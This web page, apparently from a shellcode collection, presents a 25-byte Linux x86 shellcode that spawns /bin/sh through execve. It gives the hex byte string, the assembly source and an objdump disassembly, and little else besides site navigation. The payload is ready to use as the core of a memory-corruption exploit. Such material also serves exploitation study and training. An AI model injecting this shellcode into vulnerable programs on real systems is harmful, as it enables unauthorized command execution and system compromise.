Shellcode - execve("/bin//sh", ["/bin//sh"], NULL)

Written by Thireus

Wednesday, 30 March 2011 03:55

Shellcode - Details

System call(s):	execve("/bin//sh", ["/bin//sh"], NULL)
Size (char):	25
Shellcode:	\x31\xc0\x31\xd2\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80

Architecture

CPU maker:
Architecture:	x86
OS details:	Linux
CPU details:	i386

.globl _start

_start: 	xor	%eax, 	 	%eax
		xor     %edx, 	 	%edx

		movb    $11, 	 	%al

		push    %edx
		push    $0x68732f6e
		push    $0x69622f2f
		mov    	%esp, 	 	%ebx
		
		push    %edx
		push    %ebx
		mov    	%esp, 	 	%ecx
		
		int   	$0x80

file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
8048074:    31 c0                    xor    %eax,%eax
8048076:    31 d2                    xor    %edx,%edx
8048078:    b0 0b                    mov    $0xb,%al
804807a:    52                       push   %edx
804807b:    68 6e 2f 73 68           push   $0x68732f6e
8048080:    68 2f 2f 62 69           push   $0x69622f2f
8048085:    89 e3                    mov    %esp,%ebx
8048087:    52                       push   %edx
8048088:    53                       push   %ebx
8048089:    89 e1                    mov    %esp,%ecx
804808b:    cd 80                    int    $0x80

Only registered users can write comments!

Comments

Last Updated on Thursday, 20 October 2011 15:32

Thank Me

Last Modified Articles

Most Read Articles

Who's Online

Web Links